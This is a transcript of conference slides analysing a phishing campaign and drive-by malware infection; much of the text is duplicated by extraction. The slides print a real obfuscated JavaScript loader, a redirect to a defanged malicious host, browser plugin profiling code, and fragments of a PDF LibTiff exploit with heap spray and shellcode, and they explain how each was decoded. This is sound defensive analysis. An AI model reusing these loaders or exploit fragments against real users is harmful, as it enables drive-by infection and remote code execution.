Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Analyzing Phishing & Analyzing Phishing & Malware Attacks For Malware Attacks For

Neither Fun Nor ProfitNeither Fun Nor Profit

Lee BrotherstonLee Brotherston@leEb_public@leEb_public

Obligatory “where I work” Obligatory “where I work” slideslide

IntroductionIntroduction

• What is meant by Malware & Phishing?What is meant by Malware & Phishing?

• Responding with Malware & Phishing?Responding with Malware & Phishing?

• Case study + bonus tangentsCase study + bonus tangents

• QuestionsQuestions

Malware Response StepsMalware Response StepsDuring:During:

• Assess if attack was successfulAssess if attack was successful

• Assess impact to users/networkAssess impact to users/network

• Contain & RemediateContain & Remediate

Afterwards:Afterwards:

• Examine what workedExamine what worked

• Examine what failedExamine what failed

• Improve processes, procedures & toolsImprove processes, procedures & tools

Anatomy of a phishAnatomy of a phish

Attacker sends

phishing emails

Target (user) clicks on one of the links

Redirects & Obfuscation

Harvest information

Drop Malware

Bad Things!!The “real”

phishing site

Tangent #1 – Stanley Tangent #1 – Stanley MilgramMilgram

Case Study - EmailCase Study - Email

Case Study – OPSECCase Study – OPSEC

• Virtualised Environments (are not a Virtualised Environments (are not a panacea)panacea)

• No, not a real browser….. No.No, not a real browser….. No.

• wget, curl, nslookup, socat & telnet are wget, curl, nslookup, socat & telnet are your friendsyour friends

(--user-agent=“…” is also your friend)(--user-agent=“…” is also your friend)

Case Study - RedirectionCase Study - Redirection

curl --dump-header header.txt curl --dump-header header.txt

--user-agent "Mozilla/4.0 (compatible; MSIE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)“6.0; Windows NT 5.1; SV1)“

hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/

Case Study - RedirectionCase Study - Redirection<html><html><title>Redirecting to ACH details, please <title>Redirecting to ACH details, please wait.....</title>wait.....</title>

<script type="text/javascript"><script type="text/javascript">//--></script></script><noscript><noscript><meta http-equiv="refresh" content="0; <meta http-equiv="refresh" content="0; url=hxxp://EVILMALWARESITE.COM/ensure/bullurl=hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php">etin-isolate.php">

</noscript></noscript>

Case Study – Case Study – EvilMalwareSite.comEvilMalwareSite.com<body><i></i><b><body><i></i><b>

59,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,3159,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,31,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,10,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,104,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,74,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,76,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,86,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,86,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,1046,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,104,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,10,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,104,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,54,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,52,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48,103,99,70,107,117,97,105,51,102,67,80,110,55,99,72,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48,103,99,70,107,117,97,105,51,102,67,80,110,55,99,70,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,50,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,52,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,72,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,969,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,96,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,4,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,49,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108,9,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49,85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70,118,117,96,105,73,121,89,82,72,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97,,118,117,96,105,73,121,89,82,72,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97,109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,7109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,77,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,17,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,107,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,7407,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,74,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,9,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,97,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72,7,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72,105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97,105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97,86,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,886,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,89,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55,98,70,69,9,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55,98,70,69,120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,1120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,112,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,7512,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,75,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,11,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,116,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,16,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,107,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,7607,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,76,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,7,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,73,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,1183,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,118,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,102,47,74,79,66,56,112,97,108,119,118,79,102,60,60,3,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,102,47,74,79,66,56,112,97,108,119,118,79,102,60,60,33,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,43,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,44,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,484,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,48,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,5,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,59,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,19,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,100,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33,00,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33,37,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,6137,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,61

</b></b>

<script><script>try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"]try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"]

(",");for(j=0;a["length"]>j;j++)(",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].ap{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}pendChild(d);d["innerHTML"]=a;}

Tangent #2 - ObfuscationTangent #2 - Obfuscation

<script><script>document.write('Hello World');document.write('Hello World');

</script></script>

Deobfuscating Example - Deobfuscating Example - ReveloRevelo

Deobfuscating GK - ReveloDeobfuscating GK - Revelo

What What Happened?Happened?

Case StudyCase Study<script><script>try{document.body--}catch(dv32r3)try{document.body--}catch(dv32r3)

{a=document[("getEl"+"ementsByTagName")]("b"){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++)[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(Strin{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChg,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}ild(d);d["innerHTML"]=a;}

</script></script>

<script><script>z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)

{if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){dd=document;try{dd.body-=12}catch(xq){a=dd[gg]{dd=document;try{dd.body-=12}catch(xq){a=dd[gg]("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function ("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}

</script></script>

<script><script>s="";s="";zzz();zzz();az=1;try{caewbtew=~2;}catch(vava){az=0;}az=1;try{caewbtew=~2;}catch(vava){az=0;}vq();vq();u=z;uu=s;u=z;uu=s;if(az)u(uu);if(az)u(uu);</script></script>

Case StudyCase Study<script><script> try {try { document.body--document.body-- } catch (dv32r3) {} catch (dv32r3) { a = documenta = document[("getEl" + "ementsByTagName")][("getEl" + "ementsByTagName")]("b")("b")

[0].innerHTML["split"](",");[0].innerHTML["split"](","); for (j = 0; a["length"] > j; j++) {for (j = 0; a["length"] > j; j++) { a[j] = 1 + 0x1 * a[j];a[j] = 1 + 0x1 * a[j]; }} ff = "f";ff = "f"; a = String[ff + "romCharCode"a = String[ff + "romCharCode"].apply(String, a);].apply(String, a); d = document.createElement("span");d = document.createElement("span"); document["body"].appendChild(d);document["body"].appendChild(d); d["innerHTML"] = a;d["innerHTML"] = a; }}

z = eval;z = eval; ss = String;ss = String;

function vq() {function vq() { . . . . . . . . . . . . . . . . . .

Case Study – Quick & Dirty Case Study – Quick & Dirty Deobfuscate…Deobfuscate…

z = eval;z = eval;

u = z;u = z;

if (az) u(uu);if (az) u(uu);

u = eval uu = decoded scriptu = eval uu = decoded script

if(az) if(az) document.write('<code>'+document.write('<code>'+uuuu+'</code>'+'</code>'););

Et Voila!Et Voila!pdpd={version:"0.7.9",name:"pdpd",pdpd={version:"0.7.9",name:"pdpd",handler:function(c,b,a){return handler:function(c,b,a){return function()function(){c(b,a)}},openTag:"<",isDefined:{c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!function(b){return typeof b!="undefined"},isArray:function(b="undefined"},isArray:function(b){return(/array/i).test(Object.p){return(/array/i).test(Object.prototype.toString.call(b))},isFurototype.toString.call(b))},isFunc:function(b)nc:function(b)

. . . . . .. . . . . .

Edited HighlightsEdited Highlightsflash: {flash: { mimeType: "application/x-shockwave-mimeType: "application/x-shockwave-flash",flash",

progID: "ShockwaveFlash.ShockwaveFlash",progID: "ShockwaveFlash.ShockwaveFlash", classID: "clsid:D27CDB6E-AE6D-11CF-96B8-classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",444553540000",

getVersion: function () {getVersion: function () {

adobereader: {adobereader: { mimeType: "application/pdf",mimeType: "application/pdf",

java: {java: { mimeType: ["application/x-java-mimeType: ["application/x-java-applet", "application/x-java-vm", applet", "application/x-java-vm", "application/x-java-bean"],"application/x-java-bean"],

Socat - the quick (cheats) Socat - the quick (cheats) wayway

$ socat TCP4-LISTEN:8080 –$ socat TCP4-LISTEN:8080 –

GET GET http://EVILMALWARESITE.COM/ensure/bulletinhttp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php?jnlp=7dff3c2e22-isolate.php?jnlp=7dff3c2e22 HTTP/1.1 HTTP/1.1

accept-encoding: gzipaccept-encoding: gzipHost: evilmalwaresite.comHost: evilmalwaresite.comCache-Control: no-cacheCache-Control: no-cachePragma: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (Windows XP 5.1) User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21Java/1.6.0_21

Accept: text/html, image/gif, image/jpeg, *; Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2q=.2, */*; q=.2

Proxy-Connection: keep-aliveProxy-Connection: keep-alive

Case Study – Summary so Case Study – Summary so farfar

• RedirectsRedirects

• Obtains obfuscated scriptObtains obfuscated script

• De-obfuscates scriptDe-obfuscates script

• Profiles the browser (which browser, Profiles the browser (which browser, ActiveX, Flash, Java, MediaPlayer plugins, ActiveX, Flash, Java, MediaPlayer plugins, Acrobat Reader, etc)Acrobat Reader, etc)

• Collects versions & configuration of the Collects versions & configuration of the pluginsplugins

• Rewrites the current pageRewrites the current page

• Embeds the payload (PDF)Embeds the payload (PDF)

Case Study – AntiVirusCase Study – AntiVirus

Case Study – PayloadCase Study – Payload

• VirusTotalVirusTotal–LibTiff Integer OverflowLibTiff Integer Overflow–PDF:Exploit.PDF-JS.AAHPDF:Exploit.PDF-JS.AAH–PDF/Blacole-FHJ!811825B7A717PDF/Blacole-FHJ!811825B7A717–Exploit:Win32/CVE-2010-0188Exploit:Win32/CVE-2010-0188


• Malware Tracker:Malware Tracker:– 111.0@4334: suspicious.javascript in XFA 111.0@4334: suspicious.javascript in XFA

blockblock

– 111.0@4334: suspicious.warning: object 111.0@4334: suspicious.warning: object contains JavaScriptcontains JavaScript

• Let’s extract the XFA blockLet’s extract the XFA block

MalwareScanner - XFAMalwareScanner - XFA

XFA Block – here we go XFA Block – here we go again!again!

<script contentType='application/x-<script contentType='application/x-javascript'>javascript'>

if(this.execInitialize()===null)if(ImageFielif(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0)d1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event.target;}{x='eI';zz="y";z=event.target;}

xs="\x65";xs="\x65";

dd="Co"+"de";dd="Co"+"de";

ddd="ar";ddd="ar";

s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";

xx=s[2].concat('a',"l");xx=s[2].concat('a',"l");

XFA Block - ObfuscationXFA Block - Obfuscation

s=caca="ntvs=caca="ntvttdhfePJxTmlNo#hFpx!ZeA*yvv#@";dhfePJxTmlNo#hFpx!ZeA*yvv#@";

String["fr"['cString["fr"['c'+''+'oo'+"'+"nca"+s[3]]…nca"+s[3]]…

String["fr"['conca'+String["fr"['conca'+s[3]]s[3]]……

String["fr"['concat']…String["fr"['concat']…

XFA Block – ObfuscationXFA Block – Obfuscation

function ZZA(){return 2-function ZZA(){return 2-2;}2;}

sq=z[xs+xx]sq=z[xs+xx]xs="\x65"; xs="\x65"; xx=s[2].concat('a',"l");xx=s[2].concat('a',"l");

sq=eval;sq=eval;

Hex “e”Hex “e”

s[2] = “v”s[2] = “v”


if(this.execInitialize()===null)if(ImageFielif(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0)d1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event.target;}{x='eI';zz="y";z=event.target;}

====

if(1){x='eI';zz="y";z=event.target;}if(1){x='eI';zz="y";z=event.target;}

OrOr

if(0){x='eI';zz="y";z=event.target;}if(0){x='eI';zz="y";z=event.target;}

XFA Block – Just Won’t RunXFA Block – Just Won’t Run

z=event.target; <- Makes IE Barf

. == .

z=event.target;


a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZAa=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('6'),04),ZA(('6'),04),ZA(('6'),011)6'),04),ZA(('6'),04),ZA(('6'),011)…………

function ZA(a,b) {function ZA(a,b) {

a+=b;a+=b;

sq=z[xs+xx]("\x70ar"+"s"+x+s[0]+s[1]);sq=z[xs+xx]("\x70ar"+"s"+x+s[0]+s[1]);

return sq(a,16);return sq(a,16);

}}

Let’s try some guessworkLet’s try some guessworkfunction ZA(a,b){function ZA(a,b){

a+=b;a+=b;document.write(String.fromCharCode(parseInt(a, 16)));document.write(String.fromCharCode(parseInt(a, 16)));

}}

ZA(('7'),06)ZA(('7'),06)ZA(('6'),01)ZA(('6'),01)ZA(('7'),02)ZA(('7'),02)ZA(('2'),00)ZA(('2'),00)ZA(('7'),00)ZA(('7'),00)ZA(('6'),01)ZA(('6'),01)ZA(('6'),04)ZA(('6'),04)ZA(('6'),04)ZA(('6'),04)ZA((‘6’),011)ZA((‘6’),011)ZA((‘6’),E)ZA((‘6’),E)ZA((‘6’),7)ZA((‘6’),7)

Hex 76 == ‘v’Hex 76 == ‘v’Hex 61 == ‘a’Hex 61 == ‘a’Hex 72 == ‘r’Hex 72 == ‘r’Hex 20 == SpaceHex 20 == SpaceHex 70 == ‘p’Hex 70 == ‘p’Hex 61 == ‘a’Hex 61 == ‘a’Hex 64 == ‘d’Hex 64 == ‘d’Hex 64 == ‘d’Hex 64 == ‘d’????????Hex 6E == ‘n’Hex 6E == ‘n’Hex 67 == ‘g’Hex 67 == ‘g’

‘‘i’ == Hex 69i’ == Hex 69Octal 011 == Hex 9Octal 011 == Hex 9

That seemed to work! That seemed to work! (mostly)(mostly)

var padding;var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var pointers_a, i;var x = new Array();var x = new Array();var y = new Array();var y = new Array();var _l1 = var _l1 =

"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a414141"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141441260000000000000000000000000000001239804a6420600f000400004141414141414141" + ".split('').reverse().join('').replace(/;/g, 14141414141" + ".split('').reverse().join('').replace(/;/g, '');'');

_l3 = app;_l3 = app;_l4 = new Array();_l4 = new Array();

function _l5() {function _l5() { var _l6 = _l3.viewerVersion.toString();var _l6 = _l3.viewerVersion.toString(); _l6 = _l6.replace('.', '');_l6 = _l6.replace('.', ''); while (_l6.length < 4) _l6 += '0';while (_l6.length < 4) _l6 += '0'; return parseInt(_l6, 10)return parseInt(_l6, 10)}}

function _l7(_l8, _l9) {function _l7(_l8, _l9) { while (_l8.length * 2 < _l9) _l8 += _l8;while (_l8.length * 2 < _l9) _l8 += _l8; return _l8.substring(0, _l9 / 2)return _l8.substring(0, _l9 / 2)……..

Exploit Code – ObservationsExploit Code – Observations

• No real obfuscation

• No fake functions, variables or other distractions.

• Nearly all string manipulation.

Exploit - SamplesExploit - Samples

var padding;

var pointers_a, i;

loxWhee = _I1 + spray;

ImageField1.rawValue = _ll1


• Uses a LibTiff OverflowUses a LibTiff Overflow

• Executes arbitrary code, which…Executes arbitrary code, which…

• Downloads an executes .dll of attackers Downloads an executes .dll of attackers choice…choice…

Game OverGame Over

Tangent #3 – Game Over?Tangent #3 – Game Over?

Source: XKCD

Case Study – 2 weeks Case Study – 2 weeks later…later…

A breach timelineA breach timeline

Source: Verizon 2013 Data Breach Information Report

Is this isolated?Is this isolated?

But do people actually click?But do people actually click?

Source: Verizon 2013 Data Breach Information ReportSource: Verizon 2013 Data Breach Information Report

The “best” PhishThe “best” Phish

ResourcesResources

Socat: http://www.dest-unreach.org/socat/

VirusTotal: http://www.virustotal.com/

Revolo: http://www.kahusecurity.com/

Malzilla: http://malzilla.sourceforge.net/

curl/wget: Your local package management tool Malware Tracker: http://malwaretracker.com/

Javascript Beautifier: http://jsbeautifier.org/

Javascript Unpack: http://jsunpack.jeek.org DBIR: http://www.verizonenterprise.com/DBIR/2013/

http://www.dest-unreach.org/socat/

http://www.dest-unreach.org/socat/

http://www.kahusecurity.com/



http://malzilla.sourceforge.net/



http://malwaretracker.com/



http://jsbeautifier.org/

http://jsunpack.jeek.org/

http://jsunpack.jeek.org/

http://www.verizonenterprise.com/DBIR/2013/

Thank you for your time.Thank you for your time.

Any Questions?Any Questions?

Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Technology

Transcript of Analysing Phishing & Malware Attacks for Neither Fun nor Profit